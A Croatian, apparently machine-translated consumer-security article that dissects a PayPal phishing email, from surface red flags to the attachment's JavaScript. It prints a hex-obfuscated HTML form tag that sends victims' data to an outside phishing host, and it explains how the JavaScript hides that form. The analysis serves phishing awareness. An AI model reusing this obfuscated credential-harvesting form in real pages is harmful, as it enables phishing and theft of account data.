Nemojte misliti da su vaši bankovni podaci važni: nakon svega, ako netko stekne kontrolu nad prijavom na račun, oni ne samo da znaju informacije sadržane na tom računu, ali izgledi su da se isti podaci za prijavu mogu koristiti na različitim drugim računi. Ako ugroze vaš račun e-pošte, mogu vratiti sve vaše druge zaporke.
Stoga, pored održavanja snažnih i promjenjivih zaporki, uvijek morate biti u potrazi za lažnim e-porukama koje se masquerading kao pravi stvar. Dok su većina pokušaja krađe identiteta amaterski, neki su vrlo uvjerljivi pa je važno razumjeti kako ih prepoznati na površinskoj razini, kao i način na koji rade pod kapuljačom.
Slika od asirap
Ispitivanje Što je u običnom vidiku
Naš primjer e-pošte, poput većine pokušaja krađe identiteta, "obavještava" vas o aktivnosti na vašem PayPal računu koji bi, u normalnim okolnostima, bio alarmantan. Zato je poziv na radnju da potvrdite / vratite svoj račun tako što ćete poslati samo sve pojedinosti o osobnim podacima o kojima se možete sjetiti. Opet, ovo je prilično formulirano.
Iako postoje iznimke, prilično je svaka poruka e-pošte o krađi identiteta i prijevara napunjena crvenim zastavama izravno u samoj poruci. Čak i ako je tekst uvjerljiv, obično možete pronaći mnoge pogreške koje se nalaze u cijelom tijelu poruke, što ukazuje da poruka nije legit.
Tijelo poruke
- "Paypal" - Točan slučaj je "PayPal" (kapital P). Možete vidjeti kako se obje varijacije koriste u poruci. Tvrtke su vrlo inteligentne s njihovim brendiranjem, pa je dvojbeno da bi nešto slično prolazilo kroz proces proofinga.
- "Dopustite ActiveX" - Koliko puta ste vidjeli pravu web-baziranu tvrtku veličina Paypal koristi vlasničku komponentu koja radi samo na jednom pregledniku, pogotovo kada podržavaju više preglednika? Naravno, negdje tamo neka tvrtka to radi, ali ovo je crvena zastava.
- "Sigurno". - Primijetite kako se ta riječ ne podudara s marginama s ostatkom teksta odlomka. Čak i ako malo više rastegnem prozor, ne pokriva se ili prostor ispravno.
- "Paypal!" - Prostor prije uskličnika izgleda neugodno. Samo još jedan trenutak koji sam siguran da ne bi bio u pravoj e-pošti.
- "PayPal-Account Update Form.pdf.htm" - Zašto bi Paypal priložio "PDF" pogotovo kada bi se mogli povezati na stranicu na svojoj web stranici? Osim toga, zašto bi pokušali prikriti HTML datoteku kao PDF? Ovo je najveća crvena zastava svih njih.
Poruka poruke
- Od adrese je [email protected].
- Nedostaje adresa za adresu. Nisam to ispraznio, jednostavno nije dio standardne zaglavlja poruke. Obično tvrtka koja ima vaše ime personalizira vam e-poruku.
Privitak
Kada otvorim privitak, odmah možete vidjeti da izgled nije točan jer nedostaje informacija o stilu. Opet, zašto bi PayPal poslao e-poštu u HTML obrazac kad bi vam jednostavno mogli dati vezu na svojoj web stranici?
Bilješka: za to smo koristili ugrađeni preglednik HTML privitaka za ovaj, ali preporučujemo da ne otvarate privitke od zlonamjernih korisnika. Nikada. Ikad. Oni često sadrže eksploatacije koje će instalirati trojance na vaše računalo kako bi ukrali podatke o vašem računu.
Tehnička podjela
Iako bi trebalo biti prilično jasno na temelju onoga što je očito da je to pokušaj krađe identiteta, sada ćemo razbiti tehničku sastavnicu e-pošte i vidjeti što možemo pronaći.
Informacije iz privitka
Prva stvar koju treba pogledati je HTML izvor privitka koji je ono što podnosi podatke na lažno mjesto.
Kada brzo pregledavate izvor, svi se veze pojavljuju valjani jer upućuju na "paypal.com" ili "paypalobjects.com" koji su oboje pravilni.
Informacije sa zaglavlja e-pošte
Dalje ćemo pogledati zaglavlja neobrađenih poruka e-pošte. Gmail to čini dostupnim putem opcije Prikaži izvorni izbornik u poruci.
Gdje se podaci kreću?
Zato smo jasno utvrdili da je ovo poruka e-pošte za krađu identiteta i prikupila informacije o tome gdje je poruka potekla, no što je s tim gdje se šalju vaši podaci?
Da biste to vidjeli, prvo moramo spremiti privitak HTM na našu radnu površinu i otvoriti u uređivaču teksta. Pomicanje po njemu čini se da je sve u redu, osim kada dođemo do sumnjivog bloka Javascript.
Svaki put kada vidite veliki razmaknute niz naizgled nasumičnih slova i brojeva ugrađenih u blok Java, to je obično nešto sumnjivo. Gledajući kôd, varijabla "x" postavljena je na taj veliki niz, a zatim dekodiran u varijablu "y". Konačni rezultat varijable "y" tada se upisuje u dokument kao HTML.
Budući da je veliki niz izrađen od brojeva 0-9 i slova a-f, najvjerojatnije je kodiran jednostavnim ASCII do Hex pretvorbom:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Prevedeno na:
Nije slučajno da se to dekodira u valjanu oznaku HTML obrasca koja šalje rezultate ne na PayPal, već na mjesto skitnica.
Osim toga, kada vidite HTML izvor obrasca, vidjet ćete da ova oznaka obrasca nije vidljiva jer se dinamički generira putem Javascripta. Ovo je pametan način sakrivanja onoga što HTML zapravo radi ako bi netko jednostavno pogledao generirani izvor privitka (kao što smo ranije učinili) za razliku od otvaranja privitka izravno u uređivaču teksta.
Cinizam je dobra obrana
Kada je u pitanju siguran boravak on-line, nikada ne boli da ima dobar dio cinizma.
Iako sam siguran da ima više crvenih zastava u primjeru e-pošte, ono što smo gore ukazali su pokazatelji koje smo vidjeli nakon samo nekoliko minuta ispitivanja. Hipotetski, ako je površinska razina e-pošte imitirala svoje legitimne kolege 100%, tehnička analiza još uvijek bi otkrila svoju pravu prirodu. Zato je uvoz biti u mogućnosti ispitati i ono što možete i ne možete vidjeti.